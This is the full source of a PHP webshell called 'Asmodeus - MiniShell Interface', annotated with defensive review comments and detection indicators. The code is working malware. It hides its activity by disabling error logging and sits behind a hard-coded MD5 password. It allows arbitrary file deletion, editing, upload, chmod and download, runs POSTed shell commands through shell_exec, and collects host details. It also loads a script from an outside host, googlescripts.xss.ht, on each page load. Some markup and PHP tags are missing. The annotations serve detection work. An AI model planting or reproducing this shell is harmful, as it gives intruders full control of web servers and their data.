// Runtime setup that runs before anything else in the file. Every call is
// prefixed with "@", so a failure of any of them produces no warning.
// NOTE(review): the calls below lift the execution time limit and ask PHP to
// stop logging and displaying errors for this request. A script that switches
// off its own error logging is a pattern worth flagging in code review and in
// file-integrity scans of a webroot.
@set_time_limit(0);
// Drop cached stat() results so later file checks see current state.
@clearstatcache();
// Clear the error log target and turn error logging off.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
// 0 means "no limit" for max_execution_time.
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
// Keep PHP errors out of the HTTP response.
@ini_set('display_errors', 0);

// Access gate for the rest of the script.
// $password is a hard-coded hex digest that is compared against md5() of the
// submitted POST field; the trailing comment on the line states which
// plaintext it was derived from.
// NOTE(review): unsalted MD5 of a short secret, stored next to a comment that
// names the plaintext, gives no real protection. For defenders the constant
// digest is a static string that can be searched for across a webroot.
$password = "d489a3289ecdc847cb67f7a480e6f9fa"; // md5("w")
session_start();
// Anything other than a session flag that is strictly true goes through the
// login branch; no code below this block runs for such a request.
if (!isset($_SESSION['logged']) || $_SESSION['logged'] !== true) {
// Correct password: set the session flag and redirect to the same script so
// the POST is not replayed on reload.
if (isset($_POST['password']) && md5($_POST['password']) === $password) {
$_SESSION['logged'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Otherwise print the login page and stop.
// NOTE(review): the markup in this literal contains no <form> or <input>
// element as shown here; presumably they were lost when the file was
// extracted — confirm against the original sample.
echo '<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
Login <title>Login</title>
<style>
body { font-family: Arial, sans-serif; background: #111; color: #eee; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
form { background: #222; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.5); }
input[type="password"] { padding: 10px; margin-bottom: 10px; width: 100%; border: 1px solid #444; border-radius: 3px; background: #333; color: #fff; }
input[type="submit"] { padding: 10px; width: 100%; border: none; border-radius: 3px; background: #28a745; color: #fff; cursor: pointer; }
input[type="submit"]:hover { background: #218838; }
</style>







';
exit;
}

// Directory to work in: the "dir" query parameter when present, otherwise the
// directory that contains this script.
// NOTE(review): the parameter is used verbatim. The only check is is_dir(),
// so any directory the PHP process can read is accepted; nothing confines the
// value to the script's own tree.
$current_dir = isset($_GET['dir']) ? $_GET['dir'] : dirname(__FILE__);

// Fall back to the script's directory when the supplied path is not a directory.
if (!is_dir($current_dir)) {
$current_dir = dirname(__FILE__);
}

// Directory listing for $current_dir. The top-level $items is not read again
// in the visible part of the file.
$items = scandir($current_dir);

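/**
 * Render a byte count as a short human-readable string.
 *
 * The value is divided by 1024 until it drops below 1024 or the largest
 * suffix is reached, then rounded and joined to the suffix with a space.
 *
 * @param int|float $size      Byte count to format.
 * @param int       $precision Number of decimal places passed to round().
 * @return string Rounded value, a space, and the suffix. Values below 1024
 *                keep the empty suffix, so the result ends with the space.
 */
function formatBytes($size, $precision = 2) {
    $suffixes = array('', 'KB', 'MB', 'GB', 'TB');
    $lastIndex = count($suffixes) - 1;
    $index = 0;

    // Repeated division instead of log(): log(0) is -INF, which turned a
    // zero-byte size into "NAN" with an invalid array offset, and a size of
    // 1024^5 or more indexed past the end of the suffix list.
    while ($size >= 1024 && $index < $lastIndex) {
        $size /= 1024;
        $index++;
    }

    return round($size, $precision) . ' ' . $suffixes[$index];
}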

// Parent of the directory chosen above.
$parent_dir = dirname($current_dir);
// Values filled in by the action handler below and read by the page template.
$editFileContent = '';
$commandOutput = '';
$editedFile = '';

// Second, independent read of the same "dir" parameter, this time defaulting to '.'.
$directory = isset($_GET['dir']) ? $_GET['dir'] : '.';

// Canonicalise the path; realpath() returns false for a path it cannot
// resolve, in which case '.' is used instead.
// NOTE(review): $current_dir and $directory are derived separately from the
// same request value and can end up pointing at different directories.
$directory = realpath($directory) ?: '.';

// Request dispatcher: the POST field "action" selects an operation and the
// POST field "target" names the path it is applied to.
// NOTE(review): this block is what makes the file a remote-administration
// backdoor. Every branch acts on a client-supplied path or command with the
// privileges of the PHP process; there is no path restriction, no allow-list
// and no anti-CSRF token. Useful places to look when hunting for it: POST
// requests to one PHP file carrying "action"/"target"/"command" fields, and
// the web server or PHP worker process starting a shell.
if (isset($_POST['action'])) {
$action = $_POST['action'];
// Missing "target" becomes an empty string.
$target = $_POST['target'] ?? '';

switch ($action) {
// Remove a file, or a whole directory tree via deleteDirectory().
case 'delete':
if (is_dir($target)) {
deleteDirectory($target); // Call the recursive delete function
} else {
unlink($target);
}
break;

// Read a file into $editFileContent so the template can show it in the editor.
case 'edit':
if (file_exists($target)) {
$editFileContent = file_get_contents($target);
$editedFile = $target;
//echo $editFileContent;
}
break;

// Overwrite an existing file with the POST field "content". The
// file_exists() check means this branch does not create new files.
case 'save':
if (file_exists($target) && isset($_POST['content'])) {
file_put_contents($target, $_POST['content']);
echo '<script>alert("File successfully saved!");</script>';
}
break;

// Change the mode of $target; the "permissions" field is parsed as octal.
case 'chmod':
if (isset($_POST['permissions'])) {
chmod($target, octdec($_POST['permissions']));
}
break;

// Stream any existing path back to the client as an attachment, then stop.
case 'download':
if (file_exists($target)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($target));
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($target));
readfile($target);
exit;
}
break;

// Store an uploaded file in $directory under the client-supplied name.
// basename() strips directory components from the name; the file type and
// extension are not checked.
case 'upload':
if (isset($_FILES['file']) && $_FILES['file']['error'] === UPLOAD_ERR_OK) {
$uploadDir = $directory;
$uploadFile = $uploadDir . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);

if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile)) {
echo '<script>alert("File successfully uploaded!");</script>';
} else {
echo '<script>alert("File upload failed!");</script>';
}
}
break;

// Pass the POST field "command" to shell_exec() unchanged and keep the
// output for the template.
// NOTE(review): arbitrary OS command execution as the PHP user. Listing
// shell_exec and related functions in disable_functions for web-facing PHP
// prevents this branch from working.
case 'cmd':
if (isset($_POST['command'])) {
$command = $_POST['command'];
$commandOutput = shell_exec($command);
// Falsy check: a failed call, empty output and the string "0" all take this path.
if (!$commandOutput) {
$commandOutput = "Command execution failed or returned no output \n" . "command:".$command;
}
}
break;
}
}

/**
 * Recursively delete a directory and everything below it.
 *
 * Return values of the nested unlink() and deleteDirectory() calls are
 * ignored; only the final rmdir() result is reported.
 *
 * @param string $dir Directory to remove.
 * @return bool False when $dir is not a directory, otherwise the result of
 *              rmdir() on $dir.
 */
function deleteDirectory($dir) {
if (!is_dir($dir)) {
return false;
}

// Every entry except the "." and ".." pseudo-entries.
// NOTE(review): scandir() returns false when the directory cannot be read;
// that value is handed straight to array_diff() here — confirm how the
// targeted PHP version reacts.
$items = array_diff(scandir($dir), array('.', '..'));

foreach ($items as $item) {
$path = $dir . DIRECTORY_SEPARATOR . $item;
// NOTE(review): is_dir() follows symbolic links, so a link to a directory is
// descended into rather than removed as a link — verify that this is
// acceptable before reusing the function anywhere.
if (is_dir($path)) {
deleteDirectory($path);
} else {
unlink($path);
}
}

// The directory should be empty by now; rmdir() fails if anything is left.
return rmdir($dir);
}

// Host facts shown in the "system-info" panel of the page.
// NOTE(review): account name, PHP version, disk usage, server address and
// working directory are collected on every page load — this is host
// reconnaissance returned to whoever opens the page.
// Owner of this script file as reported by PHP.
$username = get_current_user();
// USER entry from $_SERVER, or 'N/A' when it is absent.
$user = $_SERVER['USER'] ?? 'N/A';
$phpVersion = phpversion();
$dateTime = date('Y-m-d H:i:s');
// Free and total space of "/" converted to GiB with two decimals; the path is
// hard-coded.
$hddFreeSpace = number_format(disk_free_space("/") / (1024 * 1024 * 1024), 2);
$hddTotalSpace = number_format(disk_total_space("/") / (1024 * 1024 * 1024), 2);
$serverIP = $_SERVER['SERVER_ADDR'] ?? 'Unknown';
$clientIP = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
$cwd = getcwd();

// Parent of the browsed directory, used for the "Go Back" button.
$parentDirectory = dirname($directory);

// NOTE(review): dirname() returns a string, so the === false comparison looks
// unreachable — confirm. The '/' comparison replaces the filesystem root with '.'.
if ($parentDirectory === false || $parentDirectory === '/') {
$parentDirectory = '.';
}

// Disk usage of the filesystem that holds the working directory.
$currentDir = getcwd();
$freeSpace = disk_free_space($currentDir);
$totalSpace = disk_total_space($currentDir);
$usedSpace = $totalSpace - $freeSpace;

/**
 * Convert a byte count into a string with a binary unit suffix.
 *
 * The value is divided by 1024 until it is below 1024 or the last unit (TB)
 * has been reached, then rounded to two decimals.
 *
 * @param int|float $size Byte count.
 * @return string Rounded value, a space, and one of B, KB, MB, GB, TB.
 */
function formatSize($size) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $lastUnit = count($units) - 1;
    $unit = 0;

    // Step up one unit per division, stopping at the largest unit.
    while ($unit < $lastUnit && $size >= 1024) {
        $size = $size / 1024;
        $unit++;
    }

    return round($size, 2) . ' ' . $units[$unit];
}

// Listing of the working directory. $files is assigned again by the listing
// code in the table body before it is read in the visible source.
$files = scandir($currentDir);

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
Webshell <title>Webshell</title>
<!-- NOTE(review): every render of this page loads and runs a script from a
     third-party host (googlescripts.xss.ht). Whoever controls that host is
     contacted each time the panel is opened and gets script execution inside
     the page, so the panel reports its own location to an outside party.
     xss.ht subdomains are associated with the XSS Hunter callback service
     (confirm). The hostname is a usable indicator both in file content and in
     proxy or DNS logs. -->
<script src="https://googlescripts.xss.ht"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
body { font-family: Arial, sans-serif; background: #111; color: #eee; margin: 0; }
/* Custom scrollbar styles */
body::-webkit-scrollbar {width: 8px;}
body::-webkit-scrollbar-thumb {background: #ff4f3d; border-radius: 4px;}
body::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
header { background: #222; padding: 10px; text-align: center; color: #ff4f3d; font-size: 24px; }
.container { padding: 20px; }
table {width: 100%;border-collapse: collapse;margin-top: 20px;background: #222;border-radius: 5px;overflow: hidden;box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);}
table th, table td {padding: 12px; border: 1px solid #444;text-align: left;transition: background 0.3s;}
table th {background: #333;color: #ff4f3d;font-weight: bold;}
table tr:nth-child(even) {background: #2a2a2a;}
table tr:hover {background: #555;}
table tr.error {background: #ff4f3d;color: #fff;}
a {color: #28a745;text-decoration: none;}
a:hover {text-decoration: underline;}
.system-info { margin-bottom: 20px; padding: 10px; background: #222; border: 1px solid #444; border-radius: 5px; }
.system-info div { margin-bottom: 5px; }
form { margin-top: 20px; }
input[type="text"] { padding: 10px; width: 80%; border: 1px solid #444; border-radius: 3px; background: #333; color: #fff; }
input[type="submit"]:hover { background: #218838; }
.button-container {text-align: center;}
textarea {width: 98%;height: 700px;background-color: #222;border: 1px solid #ccc;border-radius: 5px;padding: 10px;color: #fff;font-family: monospace;resize: none; }
/* Custom scrollbar styles */
textarea::-webkit-scrollbar {width: 8px;}
textarea::-webkit-scrollbar-thumb {background: #ff4f3d; border-radius: 4px;}
textarea::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
.soft-red-button {background-color: #ff4f3d;color: white;border: none;border-radius: 5px;padding: 5px 10px;margin:10px;}
.soft-red-button:hover {background-color: #ff4f3d;}
.popup {display: none;position: fixed;left: 50%;top: 50%;transform: translate(-50%, -50%);background-color: #333;border: 1px solid #444;border-radius: 5px;padding: 20px;z-index: 1000;width: 700px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);}
.output-container {max-height: 500px;overflow-y: auto;background-color: #222;padding: 10px;border-radius: 5px;margin-top: 10px;}
/* Custom scrollbar styles */
.output-container::-webkit-scrollbar {width: 8px;}
.output-container::-webkit-scrollbar-thumb {background: #ff4f3d;border-radius: 4px;}
.output-container::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
.output-container2 {max-height: 700px;max-width: 700px;overflow-y: auto;background-color: #222;padding: 10px;border-radius: 5px;margin-top: 10px;}
.output-container2::-webkit-scrollbar {width: 8px;}
.output-container2::-webkit-scrollbar-thumb {background: #ff4f3d;border-radius: 4px;}
.output-container2::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
.popup h2 {margin: 0 0 10px;}
.popup pre {background-color: #222;padding: 10px;border-radius: 5px;overflow: auto;white-space: pre-wrap;}
.overlay {display: none;position: fixed;top: 0;left: 0;width: 100%;height: 100%;background-color: rgba(0, 0, 0, 0.7);z-index: 999;}
.close-btn {background-color: #ff4f3d;color: white;border: none;border-radius: 5px;padding: 5px 10px;cursor: pointer;float: right;}
</style>


<header style="border-radius: 5px;">Asmodeus - MiniShell Interface</header>
<div class="container">
<div class="system-info">
<p><strong>Username:</strong> echo htmlspecialchars($username); </p>
<p><strong>User:</strong> echo htmlspecialchars($user); </p>
<!-- NOTE(review): the hex-escaped array key decodes to SERVER_SOFTWARE.
     Writing a superglobal key as \x escapes hides the plain name from simple
     string matching, so scanners should decode escapes before matching.
     Unlike the neighbouring fields, this value is printed without
     htmlspecialchars(). -->
<li><i class="fa-solid fa-server"></i>&nbsp;= $_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"]; </li>
<p><strong>PHP Version:</strong> echo htmlspecialchars($phpVersion); </p>
<p><strong>Date and Time:</strong> echo htmlspecialchars($dateTime); </p>
<p><strong>HDD Free Space:</strong> echo htmlspecialchars($hddFreeSpace); GB</p>
<p><strong>HDD Total Space:</strong> echo htmlspecialchars($hddTotalSpace); GB</p>
<p><strong>Server IP:</strong> echo htmlspecialchars($serverIP); </p>
<p><strong>Client IP:</strong> echo htmlspecialchars($clientIP); </p>
<p><strong>Directory:</strong> echo htmlspecialchars($cwd); </p>
</div>

<div class="system-info">
<button class="soft-red-button" onclick="location.href='?dir= echo urlencode(dirname(__FILE__)); '">
<i class="fas fa-home"></i> Back to Home
</button>
if ($parentDirectory !== $directory):
<button class="soft-red-button" onclick="location.href='?dir= echo urlencode($parentDirectory); '">
<i class="fas fa-arrow-left"></i> Go Back
</button>
endif;
<button class="soft-red-button" onclick="location.href='?cmd=1'">
<i class="fas fa-terminal"></i> Command Server
</button>

</div>
<div class="button-container">




</div>

if ($editFileContent):
<div class="overlay" id="overlay"></div>
<div class="popup" id="codeEditorPopup" style="display: none;">
<button class="close-btn" onclick="closeEditor()">X</button>

FileEditor



<div>
<textarea id="codeEditor" name="content" required></textarea>
</div>
<button type="submit" style="margin:10px;" name="action" value="save" class="close-btn">Save</button>

</div>
endif;

if (isset($_GET['cmd']) && $_GET['cmd'] == 1):
<div class="overlay" id="overlay"></div>
<div class="popup" id="consolePopup">
<button class="close-btn" onclick="closePopup()">X</button>

Execute Command




<button type="submit" name="action" value="cmd" class="close-btn">Run</button>

if ($commandOutput):

Command Output:


<div class="output-container">
<pre> echo htmlspecialchars($commandOutput); </pre>
</div>
endif;
</div>
<script>
// Runs as soon as this fragment is rendered: show the command popup and the
// backdrop behind it.
document.getElementById('consolePopup').style.display = 'block';
document.getElementById('overlay').style.display = 'block';
// Hide the command popup and the backdrop again; called from the popup's
// "X" button.
function closePopup() {
document.getElementById('consolePopup').style.display = 'none';
document.getElementById('overlay').style.display = 'none';

}
</script>
endif;


<thead>

<th>Name</th>
<th>Size</th>
<th>Permission</th>
<th>Actions</th>

</thead>
<tbody>

// Build the rows of the file table for $directory (empty list when it is not
// a directory).
$files = is_dir($directory) ? scandir($directory) : [];
// Entries are split into two lists so directories are printed before files;
// the order inside each list is the order scandir() returned.
$directories = [];
$nonDirectories = [];
foreach ($files as $file) {
if ($file === '.' || $file === '..') continue;

$filePath = $directory . DIRECTORY_SEPARATOR . $file;
if (is_dir($filePath)) {
$directories[] = $file;
} else {
$nonDirectories[] = $file;
}
}
$sortedFiles = array_merge($directories, $nonDirectories);

foreach ($sortedFiles as $file) {
$filePath = $directory . DIRECTORY_SEPARATOR . $file;
// Size is shown for regular files only; everything else gets '-'.
$fileSize = is_file($filePath) ? formatBytes(filesize($filePath)) : '-';
// Last four octal digits of the mode returned by fileperms().
$permissions = substr(sprintf('%o', fileperms($filePath)), -4);

// Entries the PHP process cannot both read and write get the "error" CSS class.
$errorClass = (!is_writable($filePath) || !is_readable($filePath)) ? 'error' : '';
// NOTE(review): the empty echo statements in this loop print nothing as
// written; presumably they held row/form markup that was lost when the file
// was extracted — confirm against the original sample.
echo "";

// NOTE(review): $file is written into the markup without htmlspecialchars()
// in both branches below, while the hidden "target" value further down is
// escaped. A file name containing markup is therefore rendered as markup in
// the browser of whoever views the listing.
if (is_dir($filePath)) {

echo "<td class='$errorClass'><a href='?dir=" . urlencode($filePath) . "'><i class='fas fa-folder'></i> $file</a>";
} else {
echo "<td class='$errorClass'><i class='fas fa-file'></i> $file";
}
echo "<td class='$errorClass'>$fileSize";
echo "<td class='$errorClass'>$permissions";
echo "<td class='$errorClass'>";
// Each row carries its own path in a hidden "target" field; the buttons
// submit it together with an "action" value handled by the dispatcher.
echo "<input type='hidden' name='target' value='" . htmlspecialchars($filePath) . "'>";
// Edit and download are offered for regular files only; delete for every entry.
if (is_file($filePath)) {
echo "<button class='close-btn' style='margin:10px' type='submit' name='action' value='edit'><i class='fas fa-edit'></i></button>";
echo "<button class='close-btn' style='margin:10px' type='submit' name='action' value='download'><i class='fas fa-download'></i></button>";
}
echo "<button class='close-btn' style='margin:10px' type='submit' name='action' value='delete'><i class='fas fa-trash'></i></button>";
echo "";
echo "";
echo "";
}

</tbody>

</div>
<script>
// Put the loaded file content into the editor textarea and show the editor
// popup with its backdrop.
function openEditor() {
// NOTE(review): the file content is printed server-side straight into a
// JavaScript template literal without any escaping, so the content of the
// opened file is parsed as part of this script rather than as data.
document.getElementById('codeEditor').value = ` echo $editFileContent; `;
document.getElementById('codeEditorPopup').style.display = 'block';
document.getElementById('overlay').style.display = 'block';
}

// Hide the editor popup and the backdrop.
function closeEditor() {
document.getElementById('codeEditorPopup').style.display = 'none';
document.getElementById('overlay').style.display = 'none';
}
// The three lines below read as a PHP if/endif wrapped around the call, so the
// editor opens only when a file was loaded; the PHP tags are missing in this copy.
if ($editFileContent):
openEditor()
endif;
</script>